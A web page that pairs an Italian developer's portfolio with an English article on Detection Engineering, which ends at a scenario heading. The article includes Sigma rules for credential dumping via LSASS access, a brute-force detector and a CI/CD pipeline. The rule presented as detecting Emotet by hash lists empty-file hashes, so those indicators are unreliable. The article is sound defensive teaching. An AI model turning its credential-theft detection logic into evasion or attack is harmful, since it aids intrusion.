Ciao! Sono

Federico Calò

Sviluppatore Software | Divulgatore Tecnico

Creo applicazioni web moderne e strumenti digitali personalizzati per aiutare le attività a crescere attraverso l'innovazione tecnologica. La mia passione è unire informatica ed economia per generare valore reale.

Contattami

Chi Sono

La mia passione per l'informatica è nata tra i banchi dell'Istituto Tecnico Commerciale di Maglie, dove ho scoperto il potere della programmazione e il fascino di creare soluzioni digitali. Fin da subito, ho capito che l'informatica non era solo codice, ma uno strumento straordinario per trasformare idee in realtà.

Durante gli studi superiori in Sistemi Informativi Aziendali, ho iniziato a intrecciare informatica ed economia, comprendendo come la tecnologia possa essere il motore della crescita per qualsiasi attività. Questa visione mi ha accompagnato all'Università degli Studi di Bari, dove ho conseguito la Laurea in Informatica, approfondendo le mie competenze tecniche e la mia passione per lo sviluppo software.

Oggi metto questa esperienza al servizio di imprese, professionisti e startup, creando soluzioni digitali su misura che automatizzano processi, ottimizzano risorse e aprono nuove opportunità di business. Perché la vera innovazione inizia quando la tecnologia incontra le esigenze reali delle persone.

Le Mie Competenze

Analisi Dati & Modelli Previsionali

Trasformo i dati in insights strategici con analisi approfondite e modelli predittivi per decisioni informate

Automazione Processi

Creo strumenti personalizzati che automatizzano operazioni ripetitive e liberano tempo per attività a valore aggiunto

Sistemi Custom

Sviluppo sistemi software su misura, dalle integrazioni tra piattaforme alle dashboard personalizzate

const federico = {
  nome: "Federico Calò",
  ruolo: "Sviluppatore Software",
  città: "Bari, Italia",
  missione: "Aiutare attraverso l'informatica",
  passioni: [
    "Codice Pulito",
    "Innovazione",
    "Crescita Continua"
  ]
};

La Mia Missione

Credo fermamente che l'informatica sia lo strumento più potente per trasformare le idee in realtà e migliorare la vita delle persone.

🚀

Democratizzare la Tecnologia

La mia missione è rendere l'informatica accessibile a tutti: dalle piccole imprese locali alle startup innovative, fino ai professionisti che vogliono digitalizzare la propria attività. Ogni realtà merita di sfruttare le potenzialità del digitale.

💡

Unire Informatica ed Economia

Non è solo questione di scrivere codice: è capire come la tecnologia possa generare valore reale. Intrecciando competenze informatiche e visione economica, aiuto le attività a crescere, ottimizzare processi e raggiungere nuovi traguardi di efficienza e redditività.

🎯

Creare Soluzioni su Misura

Ogni attività è unica, e così devono esserlo le soluzioni. Sviluppo strumenti personalizzati che rispondono alle esigenze specifiche di ciascun cliente, automatizzando processi ripetitivi e liberando tempo per ciò che conta davvero: far crescere il business.

Trasforma la Tua Attività con la Tecnologia

Dicembre 2024

Visualizza

Master SQL

RoadMap.sh

Novembre 2024

Visualizza

Oracle Certified Foundations Associate

Oracle

Ottobre 2024

Visualizza

People Leadership Credential

Connect

Settembre 2024

💻 Linguaggi & Tecnologie

☕Java

🐍Python

📜JavaScript

🅰️Angular

⚛️React

🔷TypeScript

🗄️SQL

🐘PHP

🎨CSS/SCSS

🔧Node.js

🐳Docker

🌿Git

💼

12/2024 - Presente

Custom Software Engineering Analyst

Accenture

Bari, Puglia, Italia · Ibrida Analisi e sviluppo di sistemi informatici attraverso l'utilizzo di Java e Quarkus in Health and Public Sector. Formazione continua su tecnologie moderne per la creazione di soluzioni software personalizzate ed efficienti e sugli agenti.

💼

06/2022 - 12/2024

Analista software e Back End Developer Associate Consultant

Links Management and Technology SpA

Esperienza nell'analisi di sistemi software as-is e flussi ETL utilizzando PowerCenter. Formazione completata su Spring Boot per lo sviluppo di applicazioni backend moderne e scalabili. Sviluppatore Backend specializzato in Spring Boot, con esperienza in progettazione di database, analisi, sviluppo e testing dei task assegnati.

💼

02/2021 - 10/2021

Programmatore software

Adesso.it (prima era WebScience srl)

Esperienza nell'analisi AS-IS e TO-BE, evoluzioni SEO ed evoluzioni website per migliorare le performance e l'engagement degli utenti.

🎓

2018 - 2025

Laurea in Informatica

Università degli Studi di Bari Aldo Moro

Bachelor's degree in Computer Science, focusing on software engineering, algorithms, and modern development practices.

📚

2013 - 2018

Diploma - Sistemi Informativi Aziendali

Istituto Tecnico Commerciale di Maglie

Technical diploma specializing in Business Information Systems, combining IT knowledge with business management.

Contattami

Hai un progetto in mente? Parliamone! Compila il form qui sotto e ti risponderò al più presto.

* Campi obbligatori. I tuoi dati saranno utilizzati solo per rispondere alla tua richiesta.

01 - Detection Engineering: from Discipline to Script to Pipeline

In an ever-evolving threat landscape, the ability to detect malicious activity before it causes significant damage represents the true differentiator between a resilient organization and a vulnerable one. For decades, threat detection was entrusted to ad-hoc rules, antivirus signatures, and individual SOC analysts' intuition. Today, this artisanal approach is no longer sustainable: the volume of logs, the complexity of cloud-native infrastructure, and the sophistication of attackers demand an engineering-driven, systematic approach.

This is how Detection Engineering was born: a discipline that applies software engineering principles to the process of creating, testing, deploying, and maintaining detection rules. It is no longer about writing isolated queries in a SIEM, but about building automated pipelines, versioning detections as code, testing them with simulated data, and measuring them with objective metrics.

What You Will Learn in This Article

What Detection Engineering is and why it has become a standalone discipline
The evolution from ad-hoc scripts to CI/CD pipelines for detections
The complete detection lifecycle: hypothesis, development, testing, deployment, tuning
Main detection types: signature-based, behavioral, anomaly-based
Quality metrics: True Positive Rate, False Positive Rate, MTTD, MTTR
The SIEM/SOAR ecosystem and fundamental data sources
The Detection-as-Code concept and CI/CD pipelines for security rules
Practical examples with Sigma rules, Python scripts, and YAML configurations

What is Detection Engineering

Detection Engineering is the systematic process of designing, developing, testing, and maintaining logic that identifies malicious activity within an organization's telemetry. This telemetry includes logs from endpoints, cloud infrastructure, identity providers, web applications, network systems, and much more.

Unlike the traditional approach, where a SOC analyst would write a query in the SIEM in response to a specific incident, Detection Engineering adopts a structured workflow resembling modern software development: code versioning, code review, automated testing, continuous deployment, and production performance monitoring.

"Detection Engineering is to SOC what Software Engineering is to coding: it transforms an ad-hoc, reactive activity into a systematic, measurable, and continuously improving discipline."
- SANS Institute, 2025 Detection Engineering Survey

The Three Pillars of Detection Engineering

The discipline is built on three interconnected pillars that define its maturity:

Threat Intelligence - Understanding who the adversaries are, what techniques they use (MITRE ATT&CK), and which organizational assets are at risk. Without a deep understanding of threats, detections will be generic and ineffective.
Data Engineering - Ensuring that necessary logs are collected, normalized, and available for analysis. A perfect detection is useless if the data it operates on is missing or of poor quality.
Software Engineering - Applying software development best practices: version control, testing, CI/CD, documentation, metrics. Detections must be treated as production code.

The Evolution: from Ad-Hoc Scripts to an Engineering Discipline

The journey that led to modern Detection Engineering can be divided into four distinct phases, each characterized by increasing levels of maturity and automation.

Phase 1: The Signature Era (1990-2005)

The earliest forms of detection relied on static signatures: known malware patterns, hashes of malicious files, specific strings in network payloads. Every antivirus and IDS (Intrusion Detection System) maintained a signature database that was periodically updated. The approach worked reasonably well with known threats but was completely blind to new variants or customized attacks.

Phase 2: The SIEM Script Era (2005-2015)

With the spread of the first SIEMs (Security Information and Event Management), analysts began writing custom queries and correlations. Each analyst had their own approach, their own scripts, their own naming conventions. Rules were created directly in the SIEM's web interface, with no versioning, no testing, no standardized documentation. When an analyst left the organization, their detections often became incomprehensible to successors.

Phase 3: The Birth of Detection Engineering (2015-2022)

Between 2015 and 2022, the security community began recognizing the need for a more structured approach. Standard formats like Sigma (2017) emerged for detection rules, the MITRE ATT&CK framework became the universal reference for mapping adversary techniques, and the first dedicated Detection Engineering teams appeared in more mature organizations.

Phase 4: Detection-as-Code and CI/CD Pipelines (2022-present)

Today, the most advanced organizations treat detections exactly like software code. Rules are written in declarative formats (Sigma, YAML), versioned in Git repositories, automatically tested with simulated data, deployed via CI/CD pipelines, and monitored with dedicated dashboards. According to the SANS 2025 Detection Engineering Survey, 60% of organizations maintain dedicated Detection Engineering teams, with 70% of enterprises with over 5,000 employees having already established structured teams.

Phase	Period	Approach	Tools	Limitations
Static Signatures	1990-2005	Pattern matching on known signatures	Antivirus, IDS (Snort)	Zero-day invisible, high latency
SIEM Scripts	2005-2015	Ad-hoc queries in SIEM	Splunk, ArcSight, QRadar	Unversioned, untested, knowledge siloed
Detection Engineering	2015-2022	Structured workflow with standards	Sigma, ATT&CK, ELK	Still many manual processes
Detection-as-Code	2022-present	CI/CD pipelines, everything versioned	Git, CI/CD, Sigma, SOAR	Requires organizational maturity

The Detection Lifecycle

Every detection follows a well-defined lifecycle that ensures quality, effectiveness, and long-term maintainability. The cycle consists of six fundamental phases, each with specific deliverables and quality criteria.

1. Hypothesis

Everything starts with a threat hypothesis. The analyst or detection engineer identifies a specific attack technique (for example, "An attacker might use PowerShell to download and execute malicious payloads") and formulates a hypothesis about how this activity would manifest in available logs. Sources for hypotheses include:

Threat Intelligence - Reports on active campaigns, observed TTPs
MITRE ATT&CK - Techniques mapped to specific tactics
Incident post-mortems - Lessons learned from previous incidents
Red Team findings - Results from penetration tests and purple teaming
Gap analysis - ATT&CK techniques without detection coverage

2. Development

With the hypothesis defined, the detection engineer writes the detection rule. This involves choosing the format (Sigma, native SIEM query, Python script), defining the required log sources, the selection and filtering logic, and documenting metadata (author, severity, ATT&CK mapping, known false positives).

3. Testing and Validation

Before deployment, the detection must be validated against real and simulated data. Testing includes: true positive testing (does the rule detect the simulated attack?), false positive testing (does the rule generate alerts on legitimate activity?), and performance testing (is the rule sufficiently performant on production log volumes?).

4. Deployment

Deployment occurs through automated pipelines that convert the rule to the target SIEM's native format, distribute it to the production environment, and verify its correct operation. In mature environments, this process is fully automated via CI/CD.

5. Monitoring and Metrics

Once in production, the detection is constantly monitored. Key metrics include the volume of generated alerts, the true/false positive ratio, mean time to detect (MTTD), and the impact on SOC analyst workload.

6. Tuning and Maintenance

Based on data collected in production, the detection is continuously refined. Tuning may include adding exceptions for recurring false positives, expanding the logic to cover technique variants, or deprecating the rule if it is no longer relevant.

Best Practice: Purple Teaming

Purple teaming significantly accelerates the detection lifecycle feedback loop. By combining the Red Team's offensive skills with the Blue Team's defensive capabilities, it is possible to simulate real attack techniques and validate detections in real time, reducing the time from hypothesis to validated detection from weeks to hours.

Detection Types: from IOC to Behavior

Detections can be classified based on the detection logic used. Each type has specific advantages and limitations, and a mature detection program combines all of them in a layered approach.

1. Signature-Based Detection

Signature-based detection looks for exact patterns in data: known file hashes, specific command strings, known malicious IP addresses or domains (IOC - Indicators of Compromise). It is the simplest and fastest type, with a very low false positive rate, but completely ineffective against new threats or variants.

Example: Sigma rule for known malicious hash detection

title: Emotet Loader Hash Detection
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: stable
description: Detects known Emotet loader by file hash
author: Detection Engineering Team
date: 2025/10/15
references:
  - https://attack.mitre.org/software/S0367/
logsource:
  category: file_event
  product: windows
detection:
  selection:
    Hashes|contains:
      - 'SHA256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
      - 'SHA256=a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a'
      - 'MD5=d41d8cd98f00b204e9800998ecf8427e'
  condition: selection
falsepositives:
  - Unlikely, known malicious hashes
level: critical
tags:
  - attack.execution
  - attack.t1204.002

2. Behavioral Detection

Behavioral detections look for sequences of actions or behavior patterns indicating suspicious activity, regardless of specific IOCs. For example, instead of searching for a specific Mimikatz hash, a behavioral detection might look for any process accessing LSASS memory to extract credentials. This approach is much more resistant to evasion, because attackers can change their tools but can hardly change the underlying technique.

Example: Sigma rule for suspicious LSASS access (behavioral)

title: Suspicious LSASS Process Access - Credential Dumping
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: |
  Detects process access to LSASS memory, a common technique
  for credential dumping (T1003.001). Focuses on behavior
  rather than specific tool signatures.
author: Federico Calo
date: 2025/11/20
references:
  - https://attack.mitre.org/techniques/T1003/001/
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess|contains:
      - '0x1010'    # PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ
      - '0x1038'    # Read memory access
      - '0x1FFFFF'  # PROCESS_ALL_ACCESS
  filter_legitimate:
    SourceImage|endswith:
      - '\MsMpEng.exe'          # Windows Defender
      - '\csrss.exe'            # Client Server Runtime
      - '\wmiprvse.exe'         # WMI Provider
      - '\svchost.exe'          # Service Host
  filter_system:
    SourceUser|contains: 'SYSTEM'
    SourceImage|startswith: 'C:\Windows\System32\'
  condition: selection and not filter_legitimate and not filter_system
falsepositives:
  - Legitimate security tools performing memory scanning
  - EDR solutions with high-privilege access
level: high
tags:
  - attack.credential_access
  - attack.t1003.001

3. Anomaly-Based Detection

Anomaly-based detections establish a baseline of normalcy and flag significant deviations. For example, if a user typically logs in from Italy during business hours, a login from China at 3 AM would be an anomaly. This approach can detect completely unknown threats (zero-day), but tends to generate more false positives, especially in dynamic environments.

4. Threat Hunting

Threat Hunting is a proactive, hypothesis-driven process where analysts actively search for threats that may have evaded automated detections. Unlike automated detections, threat hunting is exploratory and often produces new detections that are then codified and automated.

Detection Type	Precision	Zero-Day Coverage	False Positives	Maintenance	Example
Signature-Based	Very high	None	Very low	High (IOC updates)	File hashes, malicious IPs
Behavioral	High	Good	Moderate	Medium	LSASS access, lateral movement
Anomaly-Based	Variable	Excellent	High	High (baseline tuning)	Anomalous login, unusual traffic
Threat Hunting	Very high	Excellent	Minimal (manual)	High (requires analysts)	Exploratory analysis, hypotheses

Detection Quality Metrics

A detection is not useful if it is not measurable. Quality metrics allow evaluating the effectiveness of detection rules, guiding the tuning process, and justifying investments in the Detection Engineering program.

Core Operational Metrics

Metric	Description	Target	How to Improve
MTTD (Mean Time to Detect)	Average time from malicious activity to alert generation	< 4 hours (top teams: < 30 min)	Better log coverage, real-time detection
MTTR (Mean Time to Respond)	Average time from detection to containment/resolution	< 4 hours	SOAR automation, defined playbooks
True Positive Rate (TPR)	Percentage of alerts that correspond to real threats	> 80% for critical, > 60% for high	Continuous tuning, advanced filtering
False Positive Rate (FPR)	Percentage of alerts generated for legitimate activity	< 25% for critical	Whitelists, enriched context, correlation
False Negative Rate (FNR)	Percentage of real threats not detected	< 1%	Purple teaming, threat hunting
ATT&CK Coverage	Percentage of MITRE ATT&CK techniques covered by at least one detection	> 70% of relevant techniques	Regular gap analysis, prioritization

Calculating the Detection Score

A practical approach to evaluating the overall quality of a detection program is the Detection Maturity Score, which combines several metrics into a normalized score. Here is a Python calculation example:

Python - Detection Maturity Score Calculation

from dataclasses import dataclass
from typing import List

@dataclass(frozen=True)
class DetectionMetrics:
    """Immutable snapshot of detection performance metrics."""
    rule_id: str
    true_positives: int
    false_positives: int
    false_negatives: int
    total_alerts: int
    avg_detection_time_minutes: float  # MTTD
    avg_response_time_minutes: float   # MTTR

    @property
    def precision(self) -> float:
        """TP / (TP + FP) - How many alerts are real threats."""
        denominator = self.true_positives + self.false_positives
        return self.true_positives / denominator if denominator > 0 else 0.0

    @property
    def recall(self) -> float:
        """TP / (TP + FN) - How many real threats are caught."""
        denominator = self.true_positives + self.false_negatives
        return self.true_positives / denominator if denominator > 0 else 0.0

    @property
    def f1_score(self) -> float:
        """Harmonic mean of precision and recall."""
        p, r = self.precision, self.recall
        return 2 * (p * r) / (p + r) if (p + r) > 0 else 0.0


def calculate_maturity_score(metrics_list: List[DetectionMetrics]) -> dict:
    """Calculate overall detection program maturity score.

    Returns an immutable dict with aggregated metrics.
    """
    if not metrics_list:
        return {"score": 0, "grade": "F", "details": {}}

    avg_precision = sum(m.precision for m in metrics_list) / len(metrics_list)
    avg_recall = sum(m.recall for m in metrics_list) / len(metrics_list)
    avg_f1 = sum(m.f1_score for m in metrics_list) / len(metrics_list)
    avg_mttd = sum(m.avg_detection_time_minutes for m in metrics_list) / len(metrics_list)
    avg_mttr = sum(m.avg_response_time_minutes for m in metrics_list) / len(metrics_list)

    # Weighted maturity score (0-100)
    precision_score = avg_precision * 25        # 25% weight
    recall_score = avg_recall * 25              # 25% weight
    f1_component = avg_f1 * 20                  # 20% weight
    mttd_score = max(0, (240 - avg_mttd) / 240) * 15  # 15% weight (240min = 4h target)
    mttr_score = max(0, (240 - avg_mttr) / 240) * 15  # 15% weight

    total_score = (precision_score + recall_score + f1_component
                   + mttd_score + mttr_score) * 100

    grade_thresholds = [
        (90, "A"), (80, "B"), (70, "C"), (60, "D")
    ]
    grade = next(
        (g for threshold, g in grade_thresholds if total_score >= threshold),
        "F"
    )

    return {
        "score": round(total_score, 1),
        "grade": grade,
        "details": {
            "avg_precision": round(avg_precision, 3),
            "avg_recall": round(avg_recall, 3),
            "avg_f1": round(avg_f1, 3),
            "avg_mttd_minutes": round(avg_mttd, 1),
            "avg_mttr_minutes": round(avg_mttr, 1),
            "total_rules_evaluated": len(metrics_list),
        },
    }


# Usage example
sample_metrics = [
    DetectionMetrics("SIGMA-001", 45, 5, 2, 50, 15.0, 35.0),
    DetectionMetrics("SIGMA-002", 120, 30, 8, 150, 8.5, 22.0),
    DetectionMetrics("SIGMA-003", 200, 15, 5, 215, 3.2, 12.0),
]

result = calculate_maturity_score(sample_metrics)
print(f"Detection Maturity Score: {result['score']} ({result['grade']})")
print(f"Details: {result['details']}")

Warning: Vanity Metrics

Avoid measuring your detection program's success by the total number of rules or the number of alerts generated. These are vanity metrics that can mask serious problems. An organization with 50 high-fidelity detections is far more secure than one with 5,000 rules generating thousands of false positives and causing alert fatigue in analysts.

The SIEM/SOAR Ecosystem

The SIEM (Security Information and Event Management) is the heart of Detection Engineering infrastructure. It is the platform that collects, normalizes, correlates, and analyzes logs from all organizational sources. SOAR (Security Orchestration, Automation and Response) complements the SIEM by automating responses to alerts through predefined playbooks.

Overview of Major SIEM Platforms

Platform	Type	Query Language	Strengths	Ideal Use Case
Splunk Enterprise	On-prem / Cloud	SPL	Maturity, app ecosystem, flexibility	Complex enterprises, mature SOCs
Elastic SIEM	Open Source / Cloud	KQL / EQL / ES\|QL	Open source, scalability, cost	Budget-constrained teams, cloud-native
Microsoft Sentinel	Cloud (Azure)	KQL	Azure/M365 integration, built-in AI	Microsoft-centric organizations
Google SecOps (Chronicle)	Cloud (GCP)	YARA-L	Unlimited retention, speed	Large data volumes, GCP
CrowdStrike Falcon LogScale	Cloud	LogScale Query	Fast ingestion, compression	CrowdStrike organizations
Sumo Logic	Cloud	Sumo Logic Query	SaaS-native, ease of use	Cloud-first, SaaS-heavy

Fundamental Data Sources

Detection quality depends directly on the quality and completeness of available data. Here are the fundamental data sources for an effective detection program:

Endpoint Telemetry - Process logs, file system events, registry changes, network connections. Sources: EDR (CrowdStrike, SentinelOne, Microsoft Defender), Sysmon
Network Telemetry - NetFlow, DNS queries, HTTP/TLS metadata, selective PCAPs. Sources: firewalls, IDS/IPS, proxies, DNS resolvers
Identity & Access - Authentication events, privilege escalation, group membership changes. Sources: Active Directory, Entra ID, Okta, CyberArk
Cloud Audit Logs - API calls, configuration changes, resource creation. Sources: AWS CloudTrail, Azure Activity Log, GCP Audit Logs
Application Logs - Web server access logs, application errors, WAF events. Sources: Nginx, Apache, CloudFront, custom applications
Email Security - Phishing attempts, malicious attachments, BEC detection. Sources: Microsoft Defender for O365, Proofpoint, Mimecast

Data Normalization: the Invisible Foundation

Without data normalization, detections are fragile and non-portable. Every SIEM and every source uses different formats for the same concepts: a "failed login" may appear as EventID 4625 in Windows, sshd: Failed password in Linux, or {"eventType": "user.session.start", "outcome": "FAILURE"} in Okta. Adopting a normalization schema like ECS (Elastic Common Schema), OCSF (Open Cybersecurity Schema Framework), or Sigma's data model allows writing detections once and applying them across any source.

Detection-as-Code: the Modern Paradigm

Detection-as-Code (DaC) is the approach that applies software development practices to detection rule management. Instead of creating and modifying rules through the SIEM's graphical interface, detections are written as code, versioned in Git repositories, subjected to code review via pull requests, automatically tested, and deployed through CI/CD pipelines.

Detection-as-Code Advantages

Compared to Traditional Approach

Versioning - Every change is tracked in Git, with rollback capability
Code Review - Detections undergo peer review before deployment
Automated Testing - Automatic validation with positive and negative data
Reproducibility - The entire detection state is reconstructable from the repository

Operational Benefits

Speed - Detections go to production in minutes, not days
Consistency - Quality standards applied uniformly
Audit Trail - Complete traceability for compliance
Collaboration - Multiple teams can contribute to the same repository

Detection-as-Code Repository Structure

Typical DaC repository structure

detections/
  rules/
    credential_access/
      lsass_memory_access.yml
      brute_force_login.yml
      kerberoasting.yml
    execution/
      powershell_encoded_command.yml
      suspicious_wmi_execution.yml
    lateral_movement/
      psexec_usage.yml
      rdp_from_unusual_source.yml
    persistence/
      scheduled_task_creation.yml
      registry_run_key.yml
  tests/
    credential_access/
      lsass_memory_access_test.json
      brute_force_login_test.json
    execution/
      powershell_encoded_command_test.json
  config/
    sigma_config.yml
    siem_mappings.yml
    exclusions.yml
  pipelines/
    ci.yml
    cd.yml
  docs/
    CONTRIBUTING.md
    STYLE_GUIDE.md
    REVIEW_CHECKLIST.md
  README.md

CI/CD Pipeline for Detections

The CI/CD pipeline for detections automates the entire process from commit to production. Here is a configuration example for GitHub Actions:

GitHub Actions - Detection CI/CD Pipeline

name: Detection CI/CD Pipeline

on:
  pull_request:
    paths: ['rules/**', 'tests/**']
  push:
    branches: [main]
    paths: ['rules/**']

jobs:
  validate:
    name: Validate Sigma Rules
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Install sigma-cli
        run: pip install sigma-cli pySigma-backend-splunk pySigma-backend-elasticsearch

      - name: Lint Sigma Rules
        run: |
          sigma check rules/ --validation-config config/sigma_config.yml
          echo "All rules pass validation"

      - name: Verify ATT&CK Mapping
        run: |
          python scripts/verify_attack_tags.py rules/
          echo "All rules have valid ATT&CK mappings"

  test:
    name: Test Detection Logic
    needs: validate
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Run True Positive Tests
        run: |
          python scripts/run_tests.py \
            --rules-dir rules/ \
            --tests-dir tests/ \
            --test-type true_positive

      - name: Run False Positive Tests
        run: |
          python scripts/run_tests.py \
            --rules-dir rules/ \
            --tests-dir tests/ \
            --test-type false_positive

      - name: Generate Coverage Report
        run: python scripts/coverage_report.py --output reports/coverage.json

  deploy:
    name: Deploy to SIEM
    needs: test
    if: github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    environment: production
    steps:
      - uses: actions/checkout@v4

      - name: Convert Sigma to Splunk SPL
        run: |
          sigma convert \
            --target splunk \
            --pipeline splunk_windows \
            rules/ \
            --output converted/splunk/

      - name: Deploy to Splunk via API
        env:
          SPLUNK_TOKEN: #123;{ secrets.SPLUNK_API_TOKEN }}
          SPLUNK_URL: #123;{ secrets.SPLUNK_URL }}
        run: |
          python scripts/deploy_splunk.py \
            --rules-dir converted/splunk/ \
            --splunk-url "$SPLUNK_URL" \
            --token "$SPLUNK_TOKEN"

      - name: Update ATT&CK Coverage Map
        run: python scripts/update_attack_coverage.py

The Complete Detection-as-Code Flow

The detection engineer creates a new Sigma rule in a Git branch
They open a Pull Request with the rule and its associated tests
The CI pipeline runs syntax validation, TP/FP tests, and ATT&CK mapping verification
A peer reviewer approves the PR after verifying logic, documentation, and coverage
Merging to main triggers the CD pipeline that converts the rule and deploys it to the SIEM
Monitoring dashboards track the detection's performance in production

Writing Effective Detections: Principles and Patterns

The difference between a mediocre detection and an excellent one lies in the depth of understanding of the attack technique, the quality of false positive filtering, and the completeness of documentation. Here are the fundamental principles.

Principle 1: Start from the Technique, Not the Tool

Do not write a detection for "Mimikatz" - write a detection for the technique of credential dumping via LSASS memory access (T1003.001). This approach automatically covers all tools that implement the same technique, including future ones not yet known.

Principle 2: Layer Your Detections (Detection Pyramid)

Implement detections at multiple levels for the same technique. A hash-based detection (trivially evadable) can still catch unsophisticated attackers, while a behavioral detection catches more advanced ones. This layered approach is known as Detection in Depth.

Principle 3: Always Document the Context

Every detection must include: the motivation (why this detection exists), the ATT&CK mapping (which technique it covers), known false positives (which legitimate activities can trigger the rule), and the response playbook (what the analyst should do when the detection fires).

Complete Example: Detection with Python Log Analysis

Python - Log analysis for brute force detection

"""
Brute Force Detection Module
MITRE ATT&CK: T1110.001 - Brute Force: Password Guessing
Detects multiple failed login attempts followed by a success.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from collections import defaultdict
from typing import Optional


@dataclass(frozen=True)
class LoginEvent:
    """Immutable representation of a login event."""
    timestamp: datetime
    username: str
    source_ip: str
    success: bool
    service: str  # 'ssh', 'rdp', 'web', 'vpn'


@dataclass(frozen=True)
class BruteForceAlert:
    """Immutable alert generated by the detector."""
    username: str
    source_ip: str
    failed_count: int
    time_window_minutes: int
    first_attempt: datetime
    last_attempt: datetime
    successful_login: bool
    severity: str  # 'medium', 'high', 'critical'
    mitre_technique: str = "T1110.001"


@dataclass(frozen=True)
class DetectionConfig:
    """Immutable configuration for brute force detection."""
    failed_threshold: int = 5
    time_window_minutes: int = 10
    lockout_threshold: int = 20
    whitelist_ips: tuple = ()
    monitored_services: tuple = ('ssh', 'rdp', 'web', 'vpn')


class BruteForceDetector:
    """Stateless brute force detection engine.

    Analyzes login events and produces alerts when
    brute force patterns are detected.
    """

    def __init__(self, config: Optional[DetectionConfig] = None):
        self._config = config or DetectionConfig()

    def analyze(self, events: list[LoginEvent]) -> list[BruteForceAlert]:
        """Analyze a batch of login events for brute force patterns.

        Returns a new list of alerts (no mutation of input).
        """
        # Group events by (source_ip, username)
        grouped = defaultdict(list)
        for event in events:
            if (event.service in self._config.monitored_services
                    and event.source_ip not in self._config.whitelist_ips):
                key = (event.source_ip, event.username)
                grouped[key].append(event)

        alerts = []
        for (source_ip, username), user_events in grouped.items():
            sorted_events = sorted(user_events, key=lambda e: e.timestamp)
            alert = self._check_brute_force(source_ip, username, sorted_events)
            if alert is not None:
                alerts.append(alert)

        return alerts

    def _check_brute_force(
        self, source_ip: str, username: str, events: list[LoginEvent]
    ) -> Optional[BruteForceAlert]:
        """Check if events match a brute force pattern."""
        window = timedelta(minutes=self._config.time_window_minutes)
        failed_events = [e for e in events if not e.success]

        if len(failed_events) < self._config.failed_threshold:
            return None

        # Check if failures cluster within the time window
        for i, start_event in enumerate(failed_events):
            window_end = start_event.timestamp + window
            window_failures = [
                e for e in failed_events[i:]
                if e.timestamp <= window_end
            ]

            if len(window_failures) >= self._config.failed_threshold:
                # Check for subsequent successful login
                success_after = any(
                    e.success and e.timestamp >= start_event.timestamp
                    for e in events
                )

                severity = self._calculate_severity(
                    len(window_failures), success_after
                )

                return BruteForceAlert(
                    username=username,
                    source_ip=source_ip,
                    failed_count=len(window_failures),
                    time_window_minutes=self._config.time_window_minutes,
                    first_attempt=window_failures[0].timestamp,
                    last_attempt=window_failures[-1].timestamp,
                    successful_login=success_after,
                    severity=severity,
                )
        return None

    def _calculate_severity(self, failed_count: int, success: bool) -> str:
        """Determine alert severity based on pattern characteristics."""
        if success and failed_count >= self._config.lockout_threshold:
            return "critical"  # Many failures + success = likely compromised
        if success:
            return "high"      # Fewer failures + success = suspicious
        if failed_count >= self._config.lockout_threshold:
            return "high"      # Many failures = active attack
        return "medium"        # Moderate failures = possible attack

MITRE ATT&CK: the Reference Framework

The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is the universal reference for mapping and classifying adversary techniques. For Detection Engineering, ATT&CK provides a common language to describe what we are looking for and a matrix to measure the coverage of our detections.

How to Use ATT&CK for Detection Engineering

Prioritization - Not all ATT&CK techniques are equally relevant to your organization. Identify the techniques most used by adversaries in your sector (threat intelligence) and focus resources on those.
Gap Analysis - Map existing detections to ATT&CK techniques to visualize uncovered areas. Use the ATT&CK Navigator to create heatmaps showing current coverage.
Tagging - Every Sigma rule and detection must include corresponding ATT&CK tags (e.g., attack.t1003.001). This enables aggregating metrics by technique and tactic.
Measurement - Track the percentage of covered techniques per tactic (Initial Access, Execution, Persistence, etc.) and define realistic coverage targets.

Tactic	Example Techniques	Key Data Sources	Detection Difficulty
Initial Access	T1566 Phishing, T1190 Exploit Public App	Email, WAF, proxy	Medium
Execution	T1059 Command-Line, T1204 User Execution	Sysmon, EDR, process logs	Low-Medium
Persistence	T1053 Scheduled Task, T1547 Boot Autostart	Registry, file system, EDR	Medium
Privilege Escalation	T1068 Exploitation, T1078 Valid Accounts	EDR, AD logs, cloud audit	High
Defense Evasion	T1070 Indicator Removal, T1027 Obfuscation	EDR, Sysmon, AMSI	Very High
Credential Access	T1003 OS Credential Dumping, T1110 Brute Force	EDR, AD logs, auth logs	Medium
Lateral Movement	T1021 Remote Services, T1570 Lateral Tool Transfer	Network, AD logs, EDR	High
Exfiltration	T1048 Exfil Over Alt Protocol, T1567 Web Service	DLP, proxy, DNS, NetFlow	Very High

Team Structure and Roles

An effective Detection Engineering program requires a combination of skills rarely found in a single person. Team structure varies based on organization size, but key roles are well defined.

Key Roles

Detection Engineer - The central role. Writes, tests, and maintains detection rules. Requires skills in threat intelligence, SIEM query languages, scripting (Python), and familiarity with target platform logs. According to the SANS 2025 Survey, 60% of organizations have at least one dedicated detection engineer.
Threat Intelligence Analyst - Provides threat context: which APT groups are active, what techniques they use, what indicators to look for. Feeds detection hypotheses with actionable intelligence.
Data Engineer / Log Architect - Handles data quality and availability: onboarding new log sources, normalization, parsing, and managing collection infrastructure.
SOC Analyst - The end user of detections. Provides critical feedback on alert quality: too many false positives? Non-actionable alerts? Missing context information?
Red Team / Purple Team - Simulates adversary techniques to validate detections. Red team feedback is the most effective mechanism for improving rule coverage and fidelity.

Organization for Small Teams

Not every organization can afford a dedicated Detection Engineering team. For smaller security teams (3-5 people), the recommended approach is:

Allocate 20-30% of SOC analysts' time to Detection Engineering
Adopt community Sigma rules as baseline (SigmaHQ repository)
Implement a structured feedback process from alert triage
Use Detection-as-Code even with simple pipelines (Git + deploy scripts)
Focus on the 10-15 most relevant ATT&CK techniques for your sector

Real-World Case: from Incident to Detection Pipeline

To make the discussed concepts concrete, let us walk through a realistic example that illustrates the entire journey from gap discovery to production detection.

Scenario: Compromise via PowerShell Encoded Command

